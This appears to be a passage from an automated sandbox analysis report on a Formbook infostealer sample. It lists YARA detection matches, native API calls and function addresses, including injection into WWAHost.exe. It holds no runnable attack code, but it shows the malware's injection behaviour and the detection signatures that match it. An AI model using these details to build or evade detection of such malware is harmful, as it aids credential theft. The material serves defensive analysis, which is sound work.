            Source: Yara match | File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181AB NtCreateFile,1_2_004181AB
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041825A NtReadFile,1_2_0041825A
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182DD NtClose,1_2_004182DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01179910
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799A0 NtCreateSection,LdrInitializeThunk,1_2_011799A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179840 NtDelayExecution,LdrInitializeThunk,1_2_01179840
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01179860
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_011798F0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01179A00
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A20 NtResumeThread,LdrInitializeThunk,1_2_01179A20
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A50 NtCreateFile,LdrInitializeThunk,1_2_01179A50
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179540 NtReadFile,LdrInitializeThunk,1_2_01179540
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795D0 NtClose,LdrInitializeThunk,1_2_011795D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179710 NtQueryInformationToken,LdrInitializeThunk,1_2_01179710
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179780 NtMapViewOfSection,LdrInitializeThunk,1_2_01179780
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011797A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_011797A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179FE0 NtCreateMutant,LdrInitializeThunk,1_2_01179FE0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01179660
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_011796E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179950 NtQueueApcThread,1_2_01179950
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799D0 NtCreateProcessEx,1_2_011799D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179820 NtEnumerateKey,1_2_01179820
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117B040 NtSuspendThread,1_2_0117B040
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798A0 NtWriteVirtualMemory,1_2_011798A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179B00 NtSetValueKey,1_2_01179B00
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A3B0 NtGetContextThread,1_2_0117A3B0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A10 NtQuerySection,1_2_01179A10
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A80 NtOpenDirectoryObject,1_2_01179A80
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117AD30 NtSetContextThread,1_2_0117AD30
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179520 NtWaitForSingleObject,1_2_01179520
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179560 NtWriteFile,1_2_01179560
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795F0 NtQueryInformationFile,1_2_011795F0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A710 NtOpenProcessToken,1_2_0117A710
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179730 NtQueryVirtualMemory,1_2_01179730
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A770 NtOpenThread,1_2_0117A770
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179770 NtSetInformationFile,1_2_01179770
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179760 NtOpenProcess,1_2_01179760
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179610 NtEnumerateValueKey,1_2_01179610
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179650 NtQueryValueKey,1_2_01179650
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179670 NtQueryInformationProcess,1_2_01179670
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796D0 NtCreateKey,1_2_011796D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199710 NtQueryInformationToken,LdrInitializeThunk,6_2_03199710
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199780 NtMapViewOfSection,LdrInitializeThunk,6_2_03199780
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199FE0 NtCreateMutant,LdrInitializeThunk,6_2_03199FE0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A50 NtCreateFile,LdrInitializeThunk,6_2_03199A50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199650 NtQueryValueKey,LdrInitializeThunk,6_2_03199650
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03199660
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996D0 NtCreateKey,LdrInitializeThunk,6_2_031996D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_031996E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03199910
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199540 NtReadFile,LdrInitializeThunk,6_2_03199540
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999A0 NtCreateSection,LdrInitializeThunk,6_2_031999A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995D0 NtClose,LdrInitializeThunk,6_2_031995D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199840 NtDelayExecution,LdrInitializeThunk,6_2_03199840
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199860 NtQuerySystemInformation,LdrInitializeThunk,6_2_03199860
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A710 NtOpenProcessToken,6_2_0319A710
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199B00 NtSetValueKey,6_2_03199B00
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199730 NtQueryVirtualMemory,6_2_03199730
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199770 NtSetInformationFile,6_2_03199770
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A770 NtOpenThread,6_2_0319A770
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199760 NtOpenProcess,6_2_03199760
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A3B0 NtGetContextThread,6_2_0319A3B0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031997A0 NtUnmapViewOfSection,6_2_031997A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199610 NtEnumerateValueKey,6_2_03199610
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A10 NtQuerySection,6_2_03199A10
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A00 NtProtectVirtualMemory,6_2_03199A00
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A20 NtResumeThread,6_2_03199A20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199670 NtQueryInformationProcess,6_2_03199670
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A80 NtOpenDirectoryObject,6_2_03199A80
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319AD30 NtSetContextThread,6_2_0319AD30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199520 NtWaitForSingleObject,6_2_03199520
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199950 NtQueueApcThread,6_2_03199950
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199560 NtWriteFile,6_2_03199560
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999D0 NtCreateProcessEx,6_2_031999D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995F0 NtQueryInformationFile,6_2_031995F0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199820 NtEnumerateKey,6_2_03199820
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319B040 NtSuspendThread,6_2_0319B040
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998A0 NtWriteVirtualMemory,6_2_031998A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998F0 NtReadVirtualMemory,6_2_031998F0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381B0 NtCreateFile,6_2_003381B0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338260 NtReadFile,6_2_00338260
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382E0 NtClose,6_2_003382E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338390 NtAllocateVirtualMemory,6_2_00338390
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381AB NtCreateFile,6_2_003381AB
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033825A NtReadFile,6_2_0033825A
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382DD NtClose,6_2_003382DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BAABC30_2_01BAABC3
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15E00_2_01BA15E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA2F7B0_2_01BA2F7B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EB80_2_01BA0EB8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B180_2_01BA4B18
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B090_2_01BA4B09
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA12A80_2_01BA12A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA12980_2_01BA1298
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15D00_2_01BA15D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4D510_2_01BA4D51
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EA50_2_01BA0EA5
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004010301_2_00401030
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C4B1_2_00408C4B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C501_2_00408C50
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C0C1_2_00408C0C
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B4931_2_0041B493
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CD711_2_0041CD71
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D871_2_00402D87
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D901_2_00402D90
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CE591_2_0041CE59
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B7A61_2_0041B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402FB01_2_00402FB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113F9001_2_0113F900
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011541201_2_01154120
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120E8241_2_0120E824
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F10021_2_011F1002
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A8301_2_0115A830
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B0901_2_0114B090
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012020A81_2_012020A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A01_2_011620A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012028EC1_2_012028EC
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202B281_2_01202B28
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AB401_2_0115AB40
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116EBB01_2_0116EBB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F03DA1_2_011F03DA
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FDBD21_2_011FDBD2
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EFA2B1_2_011EFA2B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012022AE1_2_012022AE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202D071_2_01202D07
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01130D201_2_01130D20
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201D551_2_01201D55
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011625811_2_01162581
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114D5E01_2_0114D5E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012025DD1_2_012025DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114841F1_2_0114841F
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD4661_2_011FD466
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201FF11_2_01201FF1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120DFCE1_2_0120DFCE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD6161_2_011FD616
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01156E301_2_01156E30
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202EF71_2_01202EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222B286_2_03222B28
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318EBB06_2_0318EBB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221FF16_2_03221FF1
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321DBD26_2_0321DBD2
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03176E306_2_03176E30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032222AE6_2_032222AE
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222EF76_2_03222EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315F9006_2_0315F900
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222D076_2_03222D07
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03150D206_2_03150D20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031741206_2_03174120
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221D556_2_03221D55
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031825816_2_03182581
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316D5E06_2_0316D5E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032225DD6_2_032225DD
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316841F6_2_0316841F
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032110026_2_03211002
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321D4666_2_0321D466
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316B0906_2_0316B090
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032220A86_2_032220A8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031820A06_2_031820A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032228EC6_2_032228EC
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C0C6_2_00328C0C
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C506_2_00328C50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C4B6_2_00328C4B
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B4936_2_0033B493
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CD716_2_0033CD71
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D906_2_00322D90
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D876_2_00322D87
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CE596_2_0033CE59
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322FB06_2_00322FB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B7A66_2_0033B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: String function: 0113B150 appears 54 times
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0315B150 appears 35 times
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.675137695.0000000001080000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718379211.0000000002E26000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.717394980.00000000013BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000000.674352218.0000000000760000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
